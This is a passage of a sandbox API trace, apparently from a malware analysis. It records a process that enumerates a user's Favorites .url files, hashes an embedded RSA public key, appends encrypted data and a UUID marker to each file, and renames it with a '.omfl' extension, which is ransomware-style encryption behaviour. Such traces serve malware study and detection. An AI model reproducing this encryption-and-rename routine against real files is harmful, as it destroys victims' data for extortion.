(HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.493] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.493] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.494] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.494] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.494] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0132.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0132.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0132.495] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0132.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbbe0 [0132.495] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0132.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0132.495] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0132.495] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0132.495] PathFindFileNameW (pszPath="") returned="" [0132.495] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0132.496] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.497] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0132.497] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.497] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.497] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned=".url" [0132.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.497] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0132.498] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.501] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.501] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.502] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.502] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0132.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.502] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.502] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.502] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.503] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.503] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.503] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.503] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.503] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.503] GetLastError () returned 0x0 [0132.504] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.504] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.504] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.504] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.504] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.504] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.504] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.504] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.504] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.505] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.505] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.505] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.505] CloseHandle (hObject=0x610) returned 1 [0132.509] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0c20 [0132.509] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8b0) returned 0x74fb288 [0132.509] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0c20 | out: hHeap=0x4970000) returned 1 [0132.509] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.omfl")) returned 1 [0132.510] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.510] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.510] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0132.513] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0132.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xbe) returned 0x74e6bb8 [0132.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.514] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0132.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0132.514] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=133) returned 1 [0132.514] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0132.517] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.517] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0132.518] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.518] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.518] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.518] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x85, lpOverlapped=0x0) returned 1 [0132.519] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.519] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0132.519] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.519] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0132.519] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0132.520] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0132.520] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0132.520] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0132.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0132.520] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0132.520] GetLastError () returned 0x0 [0132.520] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0132.520] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0132.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.520] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0132.520] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0132.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.520] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0132.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0132.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14728 [0132.521] SetFilePointer (in: hFile=0x610, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0132.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb28 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbc28 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17430 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x49dbc70 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17448 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17478 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd171d8 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17490 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0132.521] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0132.521] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0132.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 